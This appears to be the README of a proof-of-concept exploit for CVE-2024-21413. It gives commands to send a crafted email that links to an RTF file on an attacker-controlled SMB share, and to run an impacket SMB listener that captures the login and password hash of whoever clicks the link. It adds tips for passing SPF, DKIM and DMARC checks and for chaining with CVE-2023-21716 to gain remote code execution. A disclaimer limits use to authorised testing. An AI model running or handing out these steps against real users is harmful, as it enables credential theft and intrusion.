CVE-2024-21413 - POC

Usage:

python CVE-2024-21413.py -host example.com -port 25 -from sender@example.com -recipient recipient@example.com -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf

Note

r00tb1t : is the shared test file (word in this case) from the attacker machine (xx.xx.xx.xx).

To ensure compliance with SPF, DKIM, and DMARC, use legitimate $IP and domain

Make sure to install the pexpect library if you haven't already using pip install pexpect.

Tips to excute the POC:

• Run a smb listener impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
• Run the POC

python CVE-2024-21413.py -host example.com -port 25 -from sender@example.com -recipient recipient@example.com -url example.com/path/to/shared/file/r0tb1t.rtf

• Click on the link in the received mail,and BOOM you should retrieve the login & hash in the listner
• chain this CVE with CVE-2023-21716 to obtain RCE !!!

• Kudooooos & details on CVE-2024-21413 .
• Workaround/Fix:

Caution

⚠️ Disclaimer: IMPORTANT: This script is provided for educational, ethical testing, and lawful use ONLY. Do not use it on any system or network without explicit permission. Unauthorized access to computer systems and networks is illegal, and users caught performing unauthorized activities are subject to legal actions. The author is NOT responsible for any damage caused by the misuse of this script..